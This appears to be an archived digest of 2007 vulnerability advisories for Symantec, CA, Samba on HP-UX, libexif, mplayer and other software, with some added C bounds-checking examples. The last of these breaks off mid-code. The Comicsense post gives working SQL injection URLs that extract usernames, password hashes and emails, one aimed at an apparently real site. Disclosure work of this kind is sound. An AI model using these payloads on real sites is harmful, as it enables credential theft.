SYM07-011 Symantec Reporting Server password disclosure

2007-06-05 Thread secure
SYM07-011: Symantec Reporting Server Password Disclosure 
June 5, 2007

Risk Impact: Medium
Remote Access:  Yes
Local Access: Yes
Authentication Required:Yes
Exploit available:  No

Overview
The administrator password for Symantec Reporting Server could be disclosed 
after a failed login attempt. 

Affected Product:
Reporting Server from version 1.0.197.0 up to the solution

Solution: 
Reporting 1.0.224.0
Available with  SAV 10.1 MR6  build 6000 (10.1.6.6000)  or later


Details

Symantec Reporting Server is an optional web application within the Symantec 
System Center console that can be used to create reports about 
Symantec Client Security and Symantec AntiVirus products in an enterprise 
network.  Symantec was notified that a failed attempt to log in to the 
Reporting server could result in displaying a hashed version of the password.  
An attacker could potentially use the hashed password to gain access to the 
Reporting Server database with administrator rights.  


Symantec Response

Symantec engineers confirmed that this vulnerability exists in the versions of 
Reporting Server included with Symantec Client Security 3.1 and SAV CE 10.1, as 
indicated in the table above.  Updates have been released to address the 
vulnerability. 

A successful attacker would gain access only to the Reporting Server database.  
The attacker would not automatically have access to other programs on the 
computer, unless the same account and password are used for other programs.  As 
a best practice, the accounts created for managing Reporting Server should not 
use the same id and password as the users’ network login credentials. 

During the internal review of the issue, Symantec engineers also identified and 
fixed a separate issue which could allow an attacker to disable the authentication 
system for the SCS Reporting server. If successfully exploited, this could 
allow a remote attacker to bypass authentication and access the reporting 
database. 

Mitigation
- Uninstall Reporting Server if it is not being used
- Symantec Client Security Console and the Reporting Server interface should 
be restricted to trusted access only.  
- Ensuring that the Console and Reporting are never visible external to the 
network greatly reduces opportunities for unauthorized remote access. 
- User accounts for Reporting Server should be different than the user’s 
network login account.

Symantec is not aware of any customers impacted by this issue, or of any 
attempts to exploit the issue.   

As a part of normal best practices, users should keep vendor-supplied patches 
for all application software and operating systems up-to-date.  Symantec 
strongly recommends any affected customers update SAV Reporting immediately to 
protect against possible attempts to exploit this vulnerability. 

Credit
Symantec would like to thank Mikko Korppi for reporting this issue, and 
coordinating with us on the response. 

CVE
This issue is a candidate for inclusion in the Common Vulnerabilities and 
Exposures (CVE) list (http://cve.mitre.org), which standardizes names for 
security problems.   The CVE initiative has assigned CVE-2007-3022 to this issue

Updates
Any future updates to this advisory, if required, will be posted on the 
Symantec Advisory page:
http://www.symantec.com/avcenter/security/Content/2007.06.05.html

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Symantec Product Security Team. 

Symantec takes the security and proper functionality of its products very
seriously. As founding members of the Organization for Internet Safety
(OISafety), Symantec follows the principles of responsible disclosure.
Symantec also subscribes to the vulnerability guidelines outlined by the
National Infrastructure Advisory Council (NIAC). Please contact
[EMAIL PROTECTED] if you feel you have discovered a security issue with a
Symantec product. 
Copyright (c) 2007 by Symantec Corp.




Comicsense SQL Injection Advisory/Exploit

2007-06-05 Thread s0cratex
*
* Comicsense SQL Injection Advisory/Exploit *
*

by s0cratex
[EMAIL PROTECTED]
http://plexinium.net

-
ComicSense is a script using php / mySQL. 
It allows you to easily host an Online Comic
or Image shack.
You can download it from www.gayadesign.nl/comicsense/
-

The bug is a common sql injection in "index.php"

Line 32:
$sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi";
And the variable $epi is not verified...

Exploit:

Admin username
http://site.com/comic_paht/index.php?epi=-1 UNION SELECT username,1,1 FROM users

MD5 hash password:
http://site.com/comic_paht/index.php?epi=-1 UNION SELECT password,1,1 FROM users

E-mail address:
http://www.sneakyshits.com/comics/index.php?epi=-1 union select email,1,1 from 
users


[ GLSA 200706-01 ] libexif: Integer overflow vulnerability

2007-06-05 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200706-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: libexif: Integer overflow vulnerability
  Date: June 05, 2007
  Bugs: #178081
ID: 200706-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


libexif fails to handle Exif (EXchangeable Image File) data inputs,
making it vulnerable to an integer overflow.

Background
==

libexif is a library for parsing, editing and saving Exif data.

Affected packages
=

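-------------------------------------------------------------------
     Package              /  Vulnerable  /              Unaffected
-------------------------------------------------------------------
  1  media-libs/libexif      < 0.6.15                    >= 0.6.15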

Description
===

Victor Stinner reported an integer overflow in the
exif_data_load_data_entry() function from file exif-data.c while
handling Exif data.

Impact
==

An attacker could entice a user to process a file with specially
crafted Exif extensions with an application making use of libexif,
which will trigger the integer overflow and potentially execute
arbitrary code or crash the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All libexif users should upgrade to the latest version. Please note
that users upgrading from "<=media-libs/libexif-0.6.13" should also run
revdep-rebuild after their upgrade.

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/libexif-0.6.15"
# revdep-rebuild --library=/usr/lib/libexif.so

References
==

  [ 1 ] CVE-2007-2645
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200706-01.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




ZDI-07-034: CA Multiple Product AV Engine CAB Filename Parsing Stack Overflow Vulnerability

2007-06-05 Thread zdi-disclosures
ZDI-07-034: CA Multiple Product AV Engine CAB Filename Parsing Stack
Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-034.html
June  5, 2007

-- CVE ID:
CVE-2007-2863

-- Affected Vendor:
Computer Associates

-- Affected Products:
CA Anti-Virus
eTrust EZ Antivirus
CA Internet Security Suite 2007
eTrust Internet Security Suite
eTrust EZ Armor
CA Threat Manager
CA Protection Suites
CA Secure Content Manager
CA Anti-Virus Gateway
Unicenter Network and Systems Management
BrightStor ARCserve Backup
CA Common Services

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since November 30, 2006 by Digital Vaccine protection
filter ID 4874. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of various Computer Associates products.

The specific flaw exists in the parsing of .CAB archives. When a long
filename contained in the .CAB is processed by vete.dll an exploitable
stack overflow may occur.

-- Vendor Response:
Computer Associates has issued an update to correct this vulnerability.
More details can be found at:
 
http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp

-- Disclosure Timeline:
2006.11.08 - Vulnerability reported to vendor
2006.11.30 - Digital Vaccine released to TippingPoint customers
2007.06.05 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.


CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 


SYM07-012 Symantec Reporting Server elevation of privilege

2007-06-05 Thread secure
SYM07-012 Symantec Reporting Server Elevation of Privilege

June 5, 2007 

Risk Impact
Medium 

Remote Access: Yes
Local Access: Yes
Authentication Required: No
Exploit available:  No

Overview
Files created by a Reporting Server may be accessible to an unauthorized user.  
  

Affected Products 
Reporting 1.0.197.0,  up to the solution SAV 10.1 MR6  build 6000 (10.1.6.6000) 
 or later

Solution
Reporting 1.0.224.0 or later

Reporting is not available as a stand-alone application, but is distributed 
with Symantec AntiVirus and Symantec Client Security.  Reporting 1.0.224.0  or 
later is available with the following products
SAV 10.1 MR6  build 6000 (10.1.6.6000)  or later
SCS 3.1 MR6 build 6000 (3.1.6.6000) or later


Details

Symantec Reporting Server is an optional web application within the Symantec 
System Center console that can be used to create reports about 
Symantec Client Security and Symantec AntiVirus products in an enterprise 
network.

Symantec was notified that a file created in the process of exporting data from 
Reporting Server could potentially be manipulated by an unauthorized user to 
create a malicious executable file.   An attacker could then execute the file, 
potentially gaining access to the server in the context of the web server user. 
 

Symantec Response

Symantec engineers verified that the issue exists in Reporting Server included 
with the product versions listed above.   The error occurred due to the 
improper initialization of a variable, and updates have been released to 
correct the problem.  

This vulnerability affects only systems on which the Reporting Server program 
is installed. Individual client systems are not affected.

Symantec is not aware of any customers impacted by this issue, or of any 
attempts to exploit the issue.  However, we recommend that customers update 
Reporting Server immediately to protect against possible attempts to exploit 
this issue. 


Mitigation and best practices

- Uninstall Reporting Server if it is not being used
- Symantec Client Security Console (SCS Console) and the Reporting Server 
interface should be restricted to trusted access only.  
- Ensure that the SCS Console and Reporting Server interface are never visible 
external to the network.  This greatly reduces opportunities for unauthorized 
remote access. 
- User accounts for Reporting Server should be unique, and different from the 
user’s network login account.  
- Delete exported data files which are no longer needed.  


Credit
Symantec would like to thank Ertunga Arsal of Tech Data GmbH & Co. OHG for 
reporting this issue, and coordinating with us on the response.  

CVE
This issue is a candidate for inclusion in the Common Vulnerabilities and 
Exposures (CVE) list (http://cve.mitre.org), which standardizes names for 
security problems.   The CVE initiative has assigned CVE-2007-3021 to this issue



-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Symantec Product Security Team


Symantec takes the security and proper functionality of its products very
seriously. As founding members of the 
Organization for Internet Safety (OISafety), Symantec follows the
principles of responsible disclosure. Symantec also 
subscribes to the vulnerability guidelines outlined by the National
Infrastructure Advisory Council (NIAC). Please contact 
[EMAIL PROTECTED] if you feel you have discovered a potential or actual
security issue with a Symantec product. 

Copyright (c) 2007 by Symantec Corp.







ZDI-07-035: CA Multiple Product AV Engine CAB Header Parsing Stack Overflow Vulnerability

2007-06-05 Thread zdi-disclosures
ZDI-07-035: CA Multiple Product AV Engine CAB Header Parsing Stack
Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-035.html
June  5, 2007

-- CVE ID:
CVE-2007-2864

-- Affected Vendor:
Computer Associates

-- Affected Products:
CA Anti-Virus
eTrust EZ Antivirus
CA Internet Security Suite 2007
eTrust Internet Security Suite
eTrust EZ Armor
CA Threat Manager
CA Protection Suites
CA Secure Content Manager
CA Anti-Virus Gateway
Unicenter Network and Systems Management
BrightStor ARCserve Backup
CA Common Services

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of various Computer Associates products.

The specific flaw exists within the processing of an improperly defined
"coffFiles" field in .CAB archives. Large values result in an unbounded
data copy operation which can result in an exploitable stack-based
buffer overflow.

-- Vendor Response:
Computer Associates has issued an update to correct this vulnerability.
More details can be found at:
 
http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp

-- Disclosure Timeline:
2007.02.16 - Vulnerability reported to vendor
2007.06.05 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

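The two CA advisories above (ZDI-07-034, long CAB filename; ZDI-07-035, oversized "coffFiles") both come down to trusting fields read from the archive. The following is an added example, not code from CA or ZDI: a validator that bounds coffFiles against the cabinet size and bounds each file name before anything is copied. The function names, the 256-byte name limit and the constructed sample cabinet are assumptions of this sketch; the field offsets follow the public Microsoft Cabinet format.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CFHEADER_SIZE 36u  /* fixed CFHEADER fields, no optional reserve area */
#define CFFILE_FIXED  16u  /* fixed CFFILE fields that precede szName */
#define CAB_NAME_MAX  256u /* assumed limit for szName, terminator included */

enum cab_status {
    CAB_OK, CAB_TRUNCATED, CAB_BAD_SIGNATURE, CAB_BAD_SIZE,
    CAB_BAD_COFFFILES, CAB_BAD_ENTRY, CAB_NAME_TOO_LONG
};

/* Little-endian helpers; CAB fields are stored little-endian. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)rd16(p) | ((uint32_t)rd16(p + 2) << 16);
}
static void wr32(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
}

/* Walk the CFFILE table without copying anything. Every offset and length
 * taken from the file is checked against the bytes actually present. */
enum cab_status cab_validate(const uint8_t *buf, size_t len)
{
    if (len < CFHEADER_SIZE) return CAB_TRUNCATED;
    if (memcmp(buf, "MSCF", 4) != 0) return CAB_BAD_SIGNATURE;

    uint32_t cbCabinet = rd32(buf + 8);   /* declared cabinet size */
    uint32_t coffFiles = rd32(buf + 16);  /* offset of first CFFILE */
    uint16_t cFiles    = rd16(buf + 28);  /* number of CFFILE entries */

    if (cbCabinet < CFHEADER_SIZE || cbCabinet > len) return CAB_BAD_SIZE;
    /* coffFiles must point past the header and inside the cabinet. */
    if (coffFiles < CFHEADER_SIZE || coffFiles >= cbCabinet)
        return CAB_BAD_COFFFILES;

    size_t off = coffFiles;
    for (uint16_t i = 0; i < cFiles; i++) {
        /* Need the fixed fields plus at least the name terminator. */
        if (cbCabinet - off < CFFILE_FIXED + 1) return CAB_BAD_ENTRY;
        const uint8_t *name = buf + off + CFFILE_FIXED;
        size_t room = cbCabinet - off - CFFILE_FIXED;
        size_t scan = room < CAB_NAME_MAX ? room : CAB_NAME_MAX;
        const uint8_t *nul = memchr(name, 0, scan);
        if (nul == NULL)  /* no terminator within the allowed window */
            return scan == CAB_NAME_MAX ? CAB_NAME_TOO_LONG : CAB_BAD_ENTRY;
        off += CFFILE_FIXED + (size_t)(nul - name) + 1;
    }
    return CAB_OK;
}

/* Constructed sample: header, one zeroed 8-byte CFFOLDER, one CFFILE whose
 * name is name_len 'A' bytes. coff_files is written as given so a bad value
 * can be tested. Returns the cabinet size, or 0 if cap is too small. */
size_t cab_build_sample(uint8_t *out, size_t cap, uint32_t coff_files,
                        size_t name_len)
{
    size_t total = 44 + CFFILE_FIXED + name_len + 1;
    if (cap < total) return 0;
    memset(out, 0, total);
    memcpy(out, "MSCF", 4);
    wr32(out + 8, (uint32_t)total);
    wr32(out + 16, coff_files);
    out[24] = 3; out[25] = 1;  /* versionMinor, versionMajor */
    out[26] = 1;               /* cFolders */
    out[28] = 1;               /* cFiles */
    memset(out + 44 + CFFILE_FIXED, 'A', name_len);
    return total;
}

int main(void)
{
    uint8_t cab[512];
    size_t n = cab_build_sample(cab, sizeof cab, 44, 9);
    printf("well-formed cabinet: %d\n", cab_validate(cab, n));
    n = cab_build_sample(cab, sizeof cab, 0x7fffffffu, 9);
    printf("oversized coffFiles: %d\n", cab_validate(cab, n));
    n = cab_build_sample(cab, sizeof cab, 44, 300);
    printf("300-byte file name:  %d\n", cab_validate(cab, n));
    return 0;
}
```

A scanner would run this check first and only then copy a name of the measured length into a buffer of at least CAB_NAME_MAX bytes. The sketch does not parse the optional reserve area or the previous/next cabinet strings that some headers carry.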


[security bulletin] HPSBUX02218 SSRT071424 rev.1 - HP-UX running CIFS Server (Samba), Remote Arbitrary Code Execution

2007-06-05 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01067768
Version: 1

HPSBUX02218 SSRT071424 rev.1 - HP-UX running CIFS Server (Samba), Remote 
Arbitrary Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2007-05-29
Last Updated: 2007-06-04

Potential Security Impact: Remote arbitrary code execution

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential vulnerabilities have been identified with HP-UX running CIFS Server 
(Samba). The vulnerabilities could be exploited remotely to execute arbitrary 
code.

References: CVE-2007-2446, CVE-2007-2447

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running CIFS Server (Samba) A.02.01, 
A.02.01.01, A.02.01.02, A.02.02, A.02.02.01, A.02.02.02, A.02.03, A.02.03.01.

BACKGROUND

To determine if an HP-UX system has an affected version, search the output of 
"swlist -a revision -l fileset" for an affected fileset. Then determine if the 
recommended patch or update is installed. 

AFFECTED VERSIONS 

HP-UX B.11.11 
HP-UX B.11.23 
HP-UX B.11.31 
== 
CIFS-Server.CIFS-ADMIN 
CIFS-Server.CIFS-DOC 
CIFS-Server.CIFS-LIB 
CIFS-Server.CIFS-MAN 
CIFS-Server.CIFS-RUN 
CIFS-Server.CIFS-UTIL 
action: install revision A.02.03.02 or subsequent 

END AFFECTED VERSIONS 

RESOLUTION

HP has made the following available to resolve the vulnerability: 

HP-UX release: B.11.11, B.11.23, B.11.31
CIFS Server (Samba) revision: A.02.01, A.02.01.01, A.02.01.02, A.02.02, A.02.02.01, A.02.02.02, A.02.03, A.02.03.01
Install recommendation: revision A.02.03.02 or subsequent

The updates can be downloaded from http://www.hp.com/go/softwaredepot/ 

MANUAL ACTIONS: Yes - Update 
CIFS / Samba on HP-UX B.11.11 install revision A.02.03.02 or subsequent. 
CIFS / Samba on HP-UX B.11.23 install revision A.02.03.02 or subsequent. 
CIFS / Samba on HP-UX B.11.31 install revision A.02.03.02 or subsequent. 

PRODUCT SPECIFIC INFORMATION 
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security 
Bulletins and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see: https://www.hp.com/go/swa 

HISTORY 
Version: 1 (rev.1) - 04 June 2007 Initial release 

Third Party Security Patches: Third party security patches which are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 


Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW 
MA = HP Management Agents 
MI = Misc. 3rd Party SW 
MP = HP MPE/iX 
NS = HP NonStop Servers 
OV = HP OpenVMS 
PI = HP Printing & Imaging 
ST = HP Storage SW 
TL = HP Trusted Linux 
TU = HP Tru64 UNIX 
UX = HP-UX 
VV = HP VirtualVault 

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to t

TPTI-07-09: Macrovision FLEXnet boisweb.dll ActiveX Control Buffer Overflow Vulnerability

2007-06-05 Thread TSRT
TPTI-07-09: Macrovision FLEXnet boisweb.dll ActiveX Control Buffer
Overflow Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-07-09
June  4, 2007

-- CVE ID:
CVE-2007-2419

-- Affected Vendor:
Macrovision

-- Affected Products:
Update Service 3.x
Update Service 4.x
Update Service 5.x
FLEXnet Connect 6

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since November  6, 2006 by Digital Vaccine protection
filter ID 4323, 4327. For further product information on the TippingPoint 
IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Business Objects Crystal Reports.
Exploitation requires the target to visit a malicious web site.

This specific flaw exists within the ActiveX control with CLSID
85A4A99C-8C3D-499E-A386-E0743DFF8FB7. Specifying large values to two
specific functions available in this control results in an exploitable
stack based buffer overflow.

The vulnerable function / parameters include:

* DownloadAndExecute(), second of five parameters
* AddFileEx(), third of seven parameters

-- Vendor Response:
Notification was recently (January) sent to Macrovision customers about
the vulnerability and the correct way to resolve it (patching to a
newer version of the agent resolves the issue). The exact timing of
this deployment is left to our customers and partner.

-- Disclosure Timeline:
2006.06.22 - Vulnerability reported to vendor
2006.11.06 - Digital Vaccine released to TippingPoint customers
2007.06.04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Pedram Amini, TippingPoint DVLabs



TPTI-07-10: Centennial Software XferWan.exe Stack Overflow Vulnerability

2007-06-05 Thread TSRT
TPTI-07-10: Centennial Software XferWan.exe Stack Overflow Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-07-10
June  4, 2007

-- CVE ID:
CVE-2007-2514

-- Affected Vendor:
Centennial Software

-- Affected Products:
Symantec Discovery 6.5

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since April  3, 2007 by Digital Vaccine protection
filter ID 5231. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of software utilizing Centennial Software
XferWan. Authentication is not required to exploit this vulnerability.

The specific flaw exists during the parsing of overly long requests to
the XferWAN process. When logging requests, user-supplied data is
copied to the stack resulting in an exploitable buffer overflow
condition. The following disassembly excerpt from the logging function
demonstrates the issue:

004047A0 mov cl, Filename[eax]
004047A6 mov [esp+eax+890h+ExistingFileName], cl
004047AD inc eax
004047AE test cl, cl
004047B0 jnz short loc_4047A0

A lack of sanity checking on the size of 'Filename' results in an
exploitable stack-based  buffer overflow vulnerability that can result
in a system compromise running under the context of the SYSTEM user.

-- Vendor Response:
Centennial has rectified an issue in the XFERWAN component of Centennial
Discovery which could be remotely exploited by malicious people to
compromise a system.

This issue only affects systems running non-secure communications,
which comprise a very small percentage of installations worldwide. 
Customers can find instructions on how to identify if they are
susceptible to the vulnerability and correct it, if necessary, on the
Centennial Customer Support website.

-- Disclosure Timeline:
2007.03.07 - Vulnerability reported to vendor
2007.04.03 - Digital Vaccine released to TippingPoint customers
2007.06.04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce, TippingPoint DVLabs


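The disassembly in TPTI-07-10 is a byte-by-byte copy that stops only at the source's NUL terminator. The following is an added example, not Centennial's or TippingPoint's code: the same loop written in C (counting instead of storing, so the demonstration stays in bounds) next to a length-checked replacement. The 260-byte destination size and all function names are assumptions; the advisory does not state the real buffer size.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define LOG_NAME_CAP 260 /* assumed destination size, not from the advisory */

/* C equivalent of 004047A0..004047B0:
 *   mov cl, Filename[eax]          ; cl = src[eax]
 *   mov [esp+eax+...], cl          ; dst[eax] = cl   (no bound on eax)
 *   inc eax
 *   test cl, cl / jnz              ; repeat until the NUL was copied
 * The store is left out on purpose; the function returns how many bytes
 * the original loop would have written, terminator included. */
size_t unbounded_copy_would_write(const char *src)
{
    size_t eax = 0;
    char cl;
    do {
        cl = src[eax];
        eax++;
    } while (cl != 0);
    return eax;
}

/* Bounded replacement. src_len is the number of bytes actually received,
 * so the source does not have to be NUL-terminated. Returns the number of
 * characters copied, or -1 when the name does not fit; in that case dst is
 * left as an empty string rather than a truncated name. */
int copy_name_checked(char *dst, size_t dst_cap, const char *src,
                      size_t src_len)
{
    if (dst_cap == 0) return -1;
    const char *nul = memchr(src, 0, src_len);
    size_t n = nul ? (size_t)(nul - src) : src_len;
    if (n >= dst_cap) {  /* no room for the name plus its terminator */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n);
    dst[n] = '\0';
    return (int)n;
}

int main(void)
{
    char request[1001];  /* constructed over-long request field */
    char logname[LOG_NAME_CAP];

    memset(request, 'A', sizeof request - 1);
    request[sizeof request - 1] = '\0';

    printf("original loop would write %zu bytes into %d\n",
           unbounded_copy_would_write(request), LOG_NAME_CAP);
    printf("checked copy of long name:  %d\n",
           copy_name_checked(logname, sizeof logname, request, 1000));
    printf("checked copy of short name: %d\n",
           copy_name_checked(logname, sizeof logname, "inventory.xml", 13));
    return 0;
}
```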


[ MDKSA-2007:112 ] - Updated mplayer packages fix buffer overflow vulnerability

2007-06-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:112
 http://www.mandriva.com/security/
 ___
 
 Package : mplayer
 Date: June 4, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0
 ___
 
 Problem Description:
 
 Buffer overflow in the asmrp_eval function for the Real Media input
 plugin allows remote attackers to cause a denial of service and
 possibly execute arbitrary code via a rulebook with a large number
 of rulematches.
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6172
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 830fb73b1b7ef7bce6f6f21a44d9e89f  
2007.0/i586/libdha1.0-1.0-1.pre8.13.3mdv2007.0.i586.rpm
 0235e5abe7ff905ccbe2623876946915  
2007.0/i586/mencoder-1.0-1.pre8.13.3mdv2007.0.i586.rpm
 54faca2a832a87403e4ac4f02b719d9e  
2007.0/i586/mplayer-1.0-1.pre8.13.3mdv2007.0.i586.rpm
 3adef91daba9c23859a411e6e7fed99d  
2007.0/i586/mplayer-gui-1.0-1.pre8.13.3mdv2007.0.i586.rpm 
 77b7d6c6bcaeabeacffc1a67b11783e3  
2007.0/SRPMS/mplayer-1.0-1.pre8.13.3mdv2007.0.src.rpm

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Secu

TPTI-07-08: Symantec Veritas Storage Foundation Scheduler Service Authentication Bypass Vulnerability

2007-06-05 Thread TSRT
TPTI-07-08: Symantec Veritas Storage Foundation Scheduler Service
Authentication Bypass Vulnerability 
http://dvlabs.tippingpoint.com/advisory/TPTI-07-08
June  4, 2007

-- CVE ID:
CVE-2007-2279

-- Affected Vendor:
Symantec

-- Affected Products:
Veritas Storage Foundation

-- Vulnerability Details:
This vulnerability allows an attacker to execute arbitrary code on
vulnerable installations of Symantec Veritas Storage Foundation.
Authentication is not required to exploit this vulnerability.

The specific flaw exists in the functionality exposed by the Storage
Foundation for Windows Scheduler Service, VxSchedService.exe, which
listens by default on TCP port 4888. During normal use an administrator
may add schedules to be run using the management console which requires
authentication. However, if an attacker connects directly to the
scheduler service and issues the commands, there exists no validation
of credentials.

The packet is parsed for requests as shown in the following snippet:

.text:01016720 mov eax, [ebp-80h] ; controlled buffer
.text:01016723 dec eax ;
.text:01016724 mov byte ptr [ebp-4], 1
.text:01016728 jz create_registry
.text:0101672E dec eax
.text:0101672F jz short delete_registry
.text:01016731 dec eax
.text:01016732 dec eax
.text:01016733 jz short modify_registry

A malicious attacker is able to add, modify, or delete registry values
from
HKEY_LOCAL_MACHINE\Software\Veritas\VxSvc\CurrentVersion\Schedules
which holds the schedules for snapshots. Each schedule has a PreScript
and PostScript field which allow for arbitrary commands to be executed
when the schedule is run. Modification of either of these fields will
allow for remote code execution.

-- Vendor Response:
http://seer.entsupport.symantec.com/docs/288627.htm

-- Disclosure Timeline:
2007.02.08 - Vulnerability reported to vendor
2007.06.04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Aaron Portnoy, TippingPoint DVLabs
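
The dispatch in the listing above, modelled in C beside a form that checks authentication before any handler runs. This is an added example, not code from the advisory or from Symantec; the schedule, session and request types, the handler bodies and the sample script names are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Request codes implied by the dec/jz chain in the listing:
 * 1 -> create_registry, 2 -> delete_registry, 4 -> modify_registry. */
enum { OP_CREATE = 1, OP_DELETE = 2, OP_MODIFY = 4 };
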